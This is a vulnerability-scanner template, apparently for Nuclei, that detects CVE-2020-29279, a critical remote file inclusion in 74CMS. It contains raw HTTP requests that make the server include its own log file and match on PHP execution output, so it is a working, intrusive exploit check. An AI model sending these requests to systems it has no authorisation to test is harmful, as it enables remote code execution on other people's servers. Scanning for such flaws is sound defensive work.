id: CVE-2020-29279

info:
  name: 74CMS - Remote File Inclusion
  author: DhiyaneshDK
  severity: critical
  description: |
    PHP remote file inclusion in the assign_resume_tpl method in Application/Common/Controller/BaseController.class.php in 74CMS before 6.0.48 allows remote code execution.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to version 6.0.48 or later.
  reference:
    - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/74cms/74cms%20v6.0.48%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5%2B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABgetshell.md
    - https://www.wangan.com/p/7fyg8ka5a6f81cb6
    - https://cloud.tencent.com/developer/article/1856739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29279
    epss-score: 0.52881
    epss-percentile: 0.98833
    cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
  metadata:
    vendor: 74cms
    product: 74cms
    fofa-query: app="骑士-74CMS"
  tags: cve,cve2020,74cms,rce,intrusive,file-upload,vkev,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        variable=1&tpl=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "ThinkPHP")'
        condition: and
        internal: true

  - raw:
      - |
        POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        variable=1&tpl=data/Runtime/Logs/Home/{{replace(date_time("%Y"), "20", "")}}_{{date_time("%M_%D",unix_time())}}.log

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Version"
          - "{{md5(num)}}"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100adc634b60c89df5111c32b1e3391a5785ce2edd88b5d302ee25bbc4c9746ff59022100af2cba61dd82e05205451214d477743c6f227027b4c5e73fd19c7ffd9b8a60f0:922c64590222798bb761d5b6d8e72950